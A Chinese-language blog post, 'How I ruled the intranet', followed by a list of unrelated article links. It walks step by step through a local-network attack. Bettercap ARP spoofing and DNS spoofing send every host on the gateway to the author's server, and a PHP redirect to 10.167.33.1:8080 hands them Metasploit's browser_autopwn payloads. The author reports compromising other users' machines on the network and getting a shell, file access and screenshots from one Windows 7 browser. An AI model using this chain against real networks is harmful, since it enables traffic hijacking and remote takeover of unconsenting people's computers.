我是如何統治內網的
測試主機:kali 2016.2
工具:bettercap、metasploit、dnsspoof、armitage
前期準備工作
在kali下並沒有整合bettercap,所以我們需要自己安裝
安裝完成
啟動postgresql服務
metasploit資料庫初始化
檢視資料庫連結狀態,如果這裡顯示資料庫未連線可以參考:傳送門 連線資料庫
啟動armitage(關於armitage)
準備一個hosts檔案(用於DNS欺騙)
更改:剛才試了一下,在hosts檔案中加上埠號好像會出現一些意料不到的問題。這裡我們換個思路,直接到ip地址不加埠號,然後開啟apache服務,然後將下面的程式碼儲存為index.php放在根目錄下(/var/www/html/)
<?php header("Location:http://10.167.33.1:8080"); ?>
這樣在DNS欺騙後會跳到指定ip,然後在通過php重定向到我們的payload。
還有一種方法是在下邊啟動瀏覽器自動攻擊外掛時,將埠號直接改成80埠。
/**************************************zhun bei wan cheng *****************************************/
啟動瀏覽器自動攻擊模組:browser_autopwn
等待他將所有payload載入完成
arp攻擊(執行:bettercap -X)
DNS欺騙(忘了截圖 圖是後補的 所以引數有點不一樣)
現在我們就等魚上鉤,現在同一閘道器下的主機不管開啟什麼URL都會解析到我們的URL中,當他開啟我們的URL時,程式會自動驗證哪個pay可用
我們的DNS欺騙只對同一閘道器下的主機有效,但是我們共計用的URL只要能訪問到我們的地址就可以。下圖可以看到有兩臺win10主機為arp+dns欺騙過來的,而安卓兩臺win7是我將這個URL發給了我的朋友,當然他也是在內網中的。如果我們需要攻擊一臺公網中的主機可以參考公網的Shell如何返回到內網的Kali 。最終有一臺win7的瀏覽器成功執行了我們的payload並返回了shell。
檢視檔案
螢幕截圖
當然功能遠遠不止這些,更多好玩的可以自己探索。
相關文章
- Larry Page的噩夢:Google 的統治是如何結束的Go
- 如何推翻JAVA的統治地位?Java
- Google如何統治WebGoWeb
- 我是如何建立網站的網站
- 密謀:如何推翻Java的統治地位?Java
- 我是如何在 8 周內自學程式設計的程式設計
- 我是如何在8周內自學程式設計的程式設計
- 我是如何沉迷於linux系統的?Linux
- KPCB:女性何以能夠統治網際網路
- 物聯網是如何影響我們的生活
- 我是如何對網站CSS進行架構的網站CSS架構
- 我是如何自學安卓的安卓
- 我是如何加入阿里的阿里
- 我是一個請求,我是如何被髮送的?
- 如何查詢內網系統內新增加的裝置的ip地址內網
- 在演算法帝國統治下如何生存?演算法
- 推薦下我的內網穿透內網穿透
- 我是如何實現限流的?
- 我是如何混進Google的Go
- 我是如何把計算機網路考了100分的?計算機網路
- 少寫一個`var`是如何毀掉我們網站的網站
- 我是如何在短期內快速掌握Dubbo的原理和原始碼的(純乾貨)?原始碼
- 如何從外網訪問內網Linux系統?內網Linux
- 我是如何理解並使用maven的Maven
- 我是如何學習小程式的
- 我是如何學習 Linux 的Linux
- 我們是如何選擇框架的?框架
- 大型網際網路系統架構是如何設計的?架構
- 我是如何用go-zero 實現一箇中臺系統的Go
- 谷歌在展示廣告市場如何撬動Facebook統治地位谷歌
- 我看我用內控系統
- 我是 Netflix的內容分析工程師,我的一天是這樣度過的工程師
- 我是如何自學資料結構的?資料結構
- 我是如何做評論模組的?
- 我是如何實現零焦慮的
- 我是如何搭建個人專屬chatGPT的?ChatGPT
- Cate:我是如何準備Google面試的Go面試
- 我是如何在Stack Overflow找到工作的